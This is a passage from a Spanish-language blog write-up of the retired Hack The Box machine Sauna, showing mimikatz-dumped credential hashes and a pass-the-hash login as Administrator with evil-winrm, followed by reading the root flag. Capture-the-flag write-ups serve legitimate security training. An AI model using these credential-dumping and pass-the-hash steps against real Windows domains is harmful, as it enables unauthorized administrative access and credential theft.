    OldCredentials
      des_cbc_md5       : 19d5f15d689b1ce5

<span class="k">*</span> Packages <span class="k">*</span>
    NTLM-Strong-NTOWF

<span class="k">*</span> Primary:WDigest <span class="k">*</span>
    01  b4a06d28f92506a3a336d97a66b310fa
    02  71efaf133c578bd7428bd2e1eca5a044
    03  974acf4f67e4f609eb032fd9a72e8714
    04  b4a06d28f92506a3a336d97a66b310fa
    05  79ba561a664d78d6242748774e8475c5
    06  f1188d8ed0ca1998ae828a60a8c6ac29
    07  801ddc727db9fa3de98993d88a9ffa8b
    08  a779e05da837dd2d303973304869ec0f
    09  ac2c01846aebce4cbd4e3ec69b47a65d
    10  6d863d6ae06c3addc49b7a453afe6fa0
    11  a779e05da837dd2d303973304869ec0f
    12  6676b9fdd4aa7f298f1ada64c044c230
    13  5a01167d750636d66e5602db9aece9b7
    14  f702282bd343c2fee7b98deac8950390
    15  a099aa3c81f1affeba59d79a6533f60d
    16  4bae84b8f0b0306788ff9bda4acb3bd4
    17  976d547fb9e04b0ac5ec60508c275da1
    18  50c302b71d0e08a1a2be14b56225645f
    19  edb19e08653443695f6d3599e0a6bddf
    20  c497465ddc6e2fc14cb0359d0d5de7f8
    21  2ed0b4b57196fb190a66224b2b17029f
    22  37d03051ae1cd6046975948564ab01fa
    23  d4c7554fe1beb0ed712f50cfec470471
    24  8df495fe69cdce409b9f04ea04289b9e
    25  40788044be982310920cc0740687fefd
    26  db7f66f1f1a8f46274d20cfdda5b6e1c
    27  d70226ec52f1ef198c2e1e955a1da9b6
    28  abdd681f875a9b3f3a50b36e51692a2c
    29  dcd140a2ce2bf70fed7ac0e2b60d0dee


mimikatz<span class="o">(</span>commandline<span class="o">)</span> <span class="c"># exit</span>
Bye!
<span class="k">*</span>Evil-WinRM<span class="k">*</span> PS C:<span class="se">\W</span>indows<span class="se">\T</span>emp<span class="se">\P</span>rivesc&gt; 
</code></pre></div></div>
<p>Fijarse muy bien en la sintaxis de todo en general es importante.</p>

<p>Procedemos a hacer <code class="language-plaintext highlighter-rouge">PassTheHash</code> con el Hash NTLM encontrado para el user Administrator:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># evil-winrm -i 10.10.10.175 -u Administrator -H 823452073d75b9d1cf70ebdf86c7f98e</span>
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc<span class="o">()</span> <span class="k">function </span>is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint

<span class="k">*</span>Evil-WinRM<span class="k">*</span> PS C:<span class="se">\U</span>sers<span class="se">\A</span>dministrator<span class="se">\D</span>ocuments&gt; <span class="nb">whoami
</span>egotisticalbank<span class="se">\a</span>dministrator
<span class="k">*</span>Evil-WinRM<span class="k">*</span> PS C:<span class="se">\U</span>sers<span class="se">\A</span>dministrator<span class="se">\D</span>ocuments&gt; <span class="nb">type</span> ../Desktop/root.txt
7ad57cf8f51a37019eaadxxxxxxxxxxxxxxxxxxxx
</code></pre></div></div>
<p>Maquina Sauna Hackeada ~~ Active Directory Path ~~ K0H4ck Yeah</p>

</div>


<div class="comments">
<div id="disqus_thread"></div>
<script>
 var disqus_config = function () {
     this.page.url = 'http://localhost:4000/2022/01/04/Sauna.html';
     this.page.identifier = '/2022/01/04/Sauna';
     this.page.title = 'Maquina Retirada Sauna AD de Hack The Box (Necesario VIP)';
 };

 (function() {  // REQUIRED CONFIGURATION VARIABLE: EDIT THE SHORTNAME BELOW
     var d = document, s = d.createElement('script');

     s.src = '//bitbrain-github-io.disqus.com/embed.js';

     s.setAttribute('data-timestamp', +new Date());
     (d.head || d.body).appendChild(s);
 })();
</script>
<noscript>Please enable JavaScript to view the <a href="https://disqus.com/?ref_noscript" rel="nofollow">comments powered by Disqus.</a></noscript>

</div>




<div class="related">
  <h2>related posts</h2>
  <ul class="related-posts">
    
      <li>
        <h3>
          <a href="/2023/09/29/Buff-Bof.html">
            Maquina  Retirada Buff de Hack The Box (Necesario VIP)
          </a>
        </h3>
      </li>
    
      <li>
        <h3>
          <a href="/2022/06/05/Search-AD.html">
            Maquina Retirada Search de Hack The Box (Necesario VIP)
          </a>
        </h3>
      </li>
    
      <li>
        <h3>
          <a href="/2022/06/05/Attacktive-THM-AD.html">
            Maquina Retirada Search de Hack The Box (Necesario VIP)
          </a>
        </h3>
      </li>
    
  </ul>
</div>




  
  <h2>all tags</h2>
  <div class="tag-cloud"><a href="/tag/%26/" class="set-1">&</a> <a href="/tag/8.6%2C/" class="set-1">8.6,</a> <a href="/tag/ad/" class="set-1">AD</a> <a href="/tag/aspreproast/" class="set-1">ASPREPRoast</a> <a href="/tag/asrep-roast%2C/" class="set-1">ASREP-Roast,</a> <a href="/tag/asreproast/" class="set-1">ASREPRoast</a> <a href="/tag/active/" class="set-1">Active</a> <a href="/tag/admin%2C/" class="set-1">Admin,</a> <a href="/tag/admins/" class="set-1">Admins</a> <a href="/tag/admins%2C/" class="set-1">Admins,</a> <a href="/tag/archivos/" class="set-1">Archivos</a> <a href="/tag/attack%2C/" class="set-1">Attack,</a> <a href="/tag/attacks/" class="set-1">Attacks</a> <a href="/tag/azure/" class="set-1">Azure</a> <a href="/tag/bin/" class="set-1">Bin</a> <a href="/tag/bloodhound%2C/" class="set-1">BloodHound,</a> <a href="/tag/bruta%2C/" class="set-1">Bruta,</a> <a href="/tag/bruteforce%2C/" class="set-1">BruteForce,</a> <a href="/tag/burpsuite%2C/" class="set-1">Burpsuite,</a> <a href="/tag/bypass/" class="set-1">ByPass</a> <a href="/tag/bypass%2C/" class="set-1">Bypass,</a> <a href="/tag/ca/" class="set-1">CA</a> <a href="/tag/cgi-bin%2C/" class="set-1">CGI-BIN,</a> <a href="/tag/cron%2C/" class="set-1">CRON,</a> <a href="/tag/csrf/" class="set-1">CSRF</a> <a href="/tag/chkrootkit%2C/" class="set-1">Chkrootkit,</a> <a href="/tag/churrasco%2C/" class="set-1">Churrasco,</a> <a href="/tag/cifrado/" class="set-1">Cifrado</a> <a href="/tag/crackmapexec%2C/" class="set-1">Crackmapexec,</a> <a href="/tag/cron-taks%2C/" class="set-1">Cron-taks,</a> <a href="/tag/decimal%2C/" class="set-1">Decimal,</a> <a href="/tag/device/" class="set-1">Device</a> <a href="/tag/directory%2C/" class="set-1">Directory,</a> <a href="/tag/dominios%2C/" class="set-1">Dominios,</a> <a href="/tag/dovecot%2C/" class="set-1">Dovecot,</a> <a href="/tag/elastix%2C/" class="set-1">Elastix,</a> <a href="/tag/empezando%2C/" class="set-1">Empezando,</a> <a href="/tag/encrypt-decrypt%2C/" class="set-1">Encrypt-Decrypt,</a> <a href="/tag/enumeracion%2C/" class="set-1">Enumeracion,</a> <a href="/tag/enumeration%2C/" class="set-1">Enumeration,</a> <a href="/tag/evil-winrm%2C/" class="set-1">Evil-WinRm,</a> <a href="/tag/excel%2C/" class="set-1">Excel,</a> <a href="/tag/excell/" class="set-1">Excell</a> <a href="/tag/files%2C/" class="set-1">Files,</a> <a href="/tag/firefox%2C/" class="set-1">Firefox,</a> <a href="/tag/fueza/" class="set-1">Fueza</a> <a href="/tag/fuzzing%2C/" class="set-1">Fuzzing,</a> <a href="/tag/get-adobject%2C/" class="set-1">Get-ADObject,</a> <a href="/tag/getchanges-all%2C/" class="set-1">GetChanges-All,</a> <a href="/tag/gratuitas./" class="set-1">Gratuitas.</a> <a href="/tag/group%2C/" class="set-1">Group,</a> <a href="/tag/groups%2C/" class="set-1">Groups,</a> <a href="/tag/guessing%2C/" class="set-1">Guessing,</a> <a href="/tag/gwolle%2C/" class="set-1">Gwolle,</a> <a href="/tag/htb%2C/" class="set-5">HTB,</a> <a href="/tag/hacking/" class="set-4">Hacking</a> <a href="/tag/hacking%2C/" class="set-1">Hacking,</a> <a href="/tag/heartbleed%2C/" class="set-1">HeartBleed,</a> <a href="/tag/hex%2C/" class="set-1">Hex,</a> <a href="/tag/hydra%2C/" class="set-1">Hydra,</a> <a href="/tag/iis%2C/" class="set-1">IIS,</a> <a href="/tag/iis-6.0%2C/" class="set-1">IIS-6.0,</a> <a href="/tag/irc%2C/" class="set-1">IRC,</a> <a href="/tag/impackect-secretsdump%2C/" class="set-1">Impackect-SecretsDump,</a> <a href="/tag/import/" class="set-1">Import</a> <a href="/tag/juicypotato%2C/" class="set-1">JuicyPotato,</a> <a href="/tag/kerberoasting/" class="set-1">Kerberoasting</a> <a href="/tag/kerbrute/" class="set-1">Kerbrute</a> <a href="/tag/kerbrute%2C/" class="set-1">Kerbrute,</a> <a href="/tag/ldap%2C/" class="set-1">LDAP,</a> <a href="/tag/lfi%2C/" class="set-1">LFI,</a> <a href="/tag/mail%2C/" class="set-1">Mail,</a> <a href="/tag/maquina/" class="set-1">Maquina</a> <a href="/tag/maquinas/" class="set-5">Maquinas</a> <a href="/tag/mimikatz.exe%2C/" class="set-1">Mimikatz.exe,</a> <a href="/tag/mongodb%2C/" class="set-1">MongoDB,</a> <a href="/tag/mssqlclient%2C/" class="set-1">Mssqlclient,</a> <a href="/tag/multiples/" class="set-1">Multiples</a> <a href="/tag/myssql-server%2C/" class="set-1">Myssql-Server,</a> <a href="/tag/neo4j%2C/" class="set-1">Neo4j,</a> <a href="/tag/nibbleblog%2C/" class="set-1">NibbleBlog,</a> <a href="/tag/nishang%2C/" class="set-1">Nishang,</a> <a href="/tag/oscp/" class="set-4">OSCP</a> <a href="/tag/olevba/" class="set-1">Olevba</a> <a href="/tag/php%2C/" class="set-1">PHP,</a> <a href="/tag/php./" class="set-1">PHP.</a> <a href="/tag/password/" class="set-1">Password</a> <a href="/tag/path%2C/" class="set-4">Path,</a> <a href="/tag/plugins%2C/" class="set-1">Plugins,</a> <a href="/tag/popd%2C/" class="set-1">PopD,</a> <a href="/tag/portknocking%2C/" class="set-1">PortKnocking,</a> <a href="/tag/portal%2C/" class="set-1">Portal,</a> <a href="/tag/post-explotacion./" class="set-1">Post-Explotacion.</a> <a href="/tag/powershell/" class="set-1">PowerShell</a> <a href="/tag/powerup%2C/" class="set-1">PowerUp,</a> <a href="/tag/powershell%2C/" class="set-1">Powershell,</a> <a href="/tag/privesc/" class="set-1">Privesc</a> <a href="/tag/privesc%2C/" class="set-1">Privesc,</a> <a href="/tag/proteccions%2C/" class="set-1">Proteccions,</a> <a href="/tag/python%2C/" class="set-1">Python,</a> <a href="/tag/rce%2C/" class="set-1">RCE,</a> <a href="/tag/rdp-file%2C/" class="set-1">RDP-file,</a> <a href="/tag/rpcclient%2C/" class="set-1">RPCCLIENT,</a> <a href="/tag/readgmsapassword%2C/" class="set-1">ReadGMSAPassword,</a> <a href="/tag/recycle/" class="set-1">Recycle</a> <a href="/tag/remote/" class="set-1">Remote</a> <a href="/tag/retiradas/" class="set-1">Retiradas</a> <a href="/tag/retiradas%2C/" class="set-5">Retiradas,</a> <a href="/tag/retiradas./" class="set-1">Retiradas.</a> <a href="/tag/smb%2C/" class="set-1">SMB,</a> <a href="/tag/ss%2C/" class="set-1">SS,</a> <a href="/tag/ssh%2C/" class="set-1">SSH,</a> <a href="/tag/ssrf/" class="set-1">SSRF</a> <a href="/tag/ssrf%2C/" class="set-1">SSRF,</a> <a href="/tag/suid%2C/" class="set-1">SUID,</a> <a href="/tag/sam%2C/" class="set-1">Sam,</a> <a href="/tag/samba%2C/" class="set-1">Samba,</a> <a href="/tag/scheduler%2C/" class="set-1">Scheduler,</a> <a href="/tag/secretsdump.py%2C/" class="set-1">SecretsDump.py,</a> <a href="/tag/secretsdumps.py%2C/" class="set-1">Secretsdumps.py,</a> <a href="/tag/shares/" class="set-1">Shares</a> <a href="/tag/sharphound.ps1%2C/" class="set-1">SharpHound.ps1,</a> <a href="/tag/shellshock%2C/" class="set-1">ShellShock,</a> <a href="/tag/smbclient%2C/" class="set-1">SmbClient,</a> <a href="/tag/smbmap%2C/" class="set-1">SmbMap,</a> <a href="/tag/sqsh%2C/" class="set-1">Sqsh,</a> <a href="/tag/starting/" class="set-1">Starting</a> <a href="/tag/steganografia%2C/" class="set-1">Steganografia,</a> <a href="/tag/system%2C/" class="set-1">System,</a> <a href="/tag/thm%2C/" class="set-1">THM,</a> <a href="/tag/tmux-priv%2C/" class="set-1">Tmux-Priv,</a> <a href="/tag/tomcat/" class="set-1">Tomcat</a> <a href="/tag/transferencia/" class="set-1">Transferencia</a> <a href="/tag/unrealirc%2C/" class="set-1">UnRealIRC,</a> <a href="/tag/upload/" class="set-1">Upload</a> <a href="/tag/userenum%2C/" class="set-1">Userenum,</a> <a href="/tag/vnc/" class="set-1">VNC</a> <a href="/tag/web/" class="set-1">Web</a> <a href="/tag/webshell%2C/" class="set-1">Webshell,</a> <a href="/tag/wget/" class="set-1">Wget</a> <a href="/tag/winpeas%2C/" class="set-1">WinPeas,</a> <a href="/tag/windows/" class="set-1">Windows</a> <a href="/tag/windows%2C/" class="set-1">Windows,</a> <a href="/tag/wordpress%2C/" class="set-1">Wordpress,</a> <a href="/tag/wpscan%2C/" class="set-1">Wpscan,</a> <a href="/tag/writeup/" class="set-1">Writeup</a> <a href="/tag/writeup%2C/" class="set-4">Writeup,</a> <a href="/tag/xp_cmdshell%2C/" class="set-1">Xp_CmdShell,</a> <a href="/tag/xp_dirtree%2C/" class="set-1">Xp_dirtree,</a> <a href="/tag/zona%2C/" class="set-1">Zona,</a> <a href="/tag/app-js%2C/" class="set-1">app-js,</a> <a href="/tag/de/" class="set-1">de</a> <a href="/tag/fcrackzip%2C/" class="set-1">fcrackzip,</a> <a href="/tag/html/" class="set-1">html</a> <a href="/tag/injecction/" class="set-1">injecction</a> <a href="/tag/pfsense%2C/" class="set-1">pfSense,</a> <a href="/tag/pfx2john%2C/" class="set-1">pfx2john,</a> <a href="/tag/phpliteadmin%2C/" class="set-1">phpLiteAdmin,</a> <a href="/tag/privesc/" class="set-1">privesc</a> <a href="/tag/privesc%2C/" class="set-1">privesc,</a> <a href="/tag/python%2C/" class="set-1">python,</a> <a href="/tag/smtpd%2C/" class="set-1">smtpd,</a> <a href="/tag/steghide%2C/" class="set-1">steghide,</a> <a href="/tag/tar%2C/" class="set-1">tar,</a> <a href="/tag/xss/" class="set-1">xss</a></div>
  




<script>
  let i = 0;
  const text = 'En esta ocasion empezaremos con el Writeup de la maquina de HackTheBox llamada SAUNA AD';
  const speed = parseInt('50');
  
  function typeWriter() {
    if (i < text.length) {
      document.getElementById('animated-post-description').innerHTML += text.charAt(i);
      i++;
      setTimeout(typeWriter, speed);
    }
  }

  document.getElementById('animated-post-description').style.display = 'initial';
  typeWriter();
</script>

      </div>
    </main><footer class="site-footer">
  <div class="wrapper">
    <div class="credits"><a href="https://github.com/bitbrain/jekyll-dash">dash</a> theme for Jekyll by <a href="https://github.com/bitbrain">bitbrain</a> made with <i class="fas fa-heart"></i><div class="toggleWrapper">
    <input type="checkbox" class="dn" id="theme-toggle" onclick="modeSwitcher()" checked />
    <label for="theme-toggle" class="toggle">
    <span class="toggle__handler">
      <span class="crater crater--1"></span>
      <span class="crater crater--2"></span>
      <span class="crater crater--3"></span>
    </span>
        <span class="star star--1"></span>
        <span class="star star--2"></span>
        <span class="star star--3"></span>
        <span class="star star--4"></span>
        <span class="star star--5"></span>
        <span class="star star--6"></span>
    </label>
</div>
<script type="text/javascript">
const theme = localStorage.getItem('theme');

if (theme === "light") {
    document.documentElement.setAttribute('data-theme', 'light');
} else {
    document.documentElement.setAttribute('data-theme', 'dark');
}
const userPrefers = getComputedStyle(document.documentElement).getPropertyValue('content');

function activateDarkTheme() {
    document.getElementById('theme-toggle').checked = true;
    document.documentElement.setAttribute('data-theme', 'dark');
    document.documentElement.classList.add('theme--dark');
    document.documentElement.classList.remove('theme--light');
	document.getElementById("theme-toggle").className = 'light';
	window.localStorage.setItem('theme', 'dark');
}

function activateLightTheme() {
    document.getElementById('theme-toggle').checked = false;
    document.documentElement.setAttribute('data-theme', 'light');
    document.documentElement.classList.add('theme--light');
    document.documentElement.classList.remove('theme--dark');
	document.getElementById("theme-toggle").className = 'dark';
	window.localStorage.setItem('theme', 'light');
}

if (theme === "dark") {
    activateDarkTheme();
} else if (theme === "light") {
    activateLightTheme();
} else if  (userPrefers === "light") {
    activateDarkTheme();
} else {
    activateDarkTheme();
}

function modeSwitcher() {
	let currentMode = document.documentElement.getAttribute('data-theme');
	if (currentMode === "dark") {
	    activateLightTheme();
	} else {
	    activateDarkTheme();
	}
}
</script></div>
  </div>
</footer>


<script>
      window.FontAwesomeConfig = {
        searchPseudoElements: true
      }
    </script>
  </body>

</html>
